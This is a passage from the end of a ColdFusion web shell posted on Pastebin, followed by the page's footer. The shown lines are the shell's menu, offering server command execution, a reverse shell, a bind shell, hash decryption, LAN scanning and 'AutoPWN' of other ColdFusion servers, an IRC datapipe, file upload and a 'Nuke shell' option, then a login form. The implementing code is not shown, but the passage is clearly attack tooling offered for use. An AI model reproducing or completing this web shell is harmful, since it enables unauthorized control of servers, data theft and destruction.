  947. <div id='nav'><a href="#execute" name="modal">:: Execute command on server ::</a></div>
  948. <div id='nav'><a href="#reverse" name="modal">:: Reverse shell ::</a></div>
  949. <div id='nav'><a href="#functions" name="modal">:: Functions ::</a></div>
  950. <div id='nav'><a href="#updown" name="modal">:: Upload/download files on server ::</a></div>
  951. <div id='nav'><a href="#runsql" name="modal">:: Run SQL query ::</a></div>
  952. <div id='nav'><a href="#registry" name="modal">:: Registry ::</a></div>
  953. <div id='nav'><a href="#edit" name="modal">:: Edit file ::</a></div>
  954. <div id='nav'><a href="#bind" name="modal">:: Bindshell ::</a></div>
  955. <div id='nav'><a href="#decrypt" name="modal">:: CF hash decrypter ::</a></div>
  956. <div id='nav'><a href="#upremote" name="modal">:: Upload files from remote server ::</a></div>
  957. <div id='nav'><a href="#scanlan" name="modal">:: Scan LAN for CF ::</a></div>
  958. <div id='nav'><a href="#autopwn" name="modal">:: AutoPWN remote CF ::</a></div>
  959. <div id='nav'><a href="#irc" name="modal">:: IRC datapipe ::</a></div>
  960. <div id='nav'><a href="#nuke" name="modal">:: Nuke shell ::</a></div>
  961. </div>
  962. </div>
  963. </td></tr>
  964. </table>
  965. <div>
  966. <cfset tickEnd = GetTickCount()>
  967. <cfset loopTime = tickEnd - tickBegin>
  968. <center><pre>XiX<blink>_</blink> | &fnof;uZE | <cfoutput>#loopTime#ms</cfoutput></pre></center>
  969. </cfif>
  970. </div>
  971. <cfif IsUserLoggedIn() eq "No">
  972. <cfform name="LoginForm" method="post" format="html">
  973. <center>
  974. <table border="1" cellpadding="5" cellspacing="0">
  975. <tr>
  976. <td colspan="2" align="center">
  977. <img src="<cfoutput>#icon#</cfoutput>">
  978. </td>
  979. </tr>
  980. <tr valign="top">
  981. <td>UserName</td>
  982. <td>
  983. <cfinput name="UserName" type="text" id="_color" style="background-color:666666; color:White; width:250px; height:25px;">
  984. </td>
  985. </tr>
  986. <tr valign="top">
  987. <td>Password</td>
  988. <td>
  989. <cfinput name="Password" type="password" style="background-color:666666; color:White; width:250px; height:25px;">
  990. </td>
  991. </tr>
  992. <tr valign="top">
  993. <td colspan="2" align="right">
  994. <cfinput class="_btn" type="submit" name="LoginButton" value="Login">
  995. </td>
  996. </tr>
  997. </table>
  998. </center>
  999. </cfform>
  1000. </cfif>
  1001.  
  1002. </body>
  1003.  
  1004. </html>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!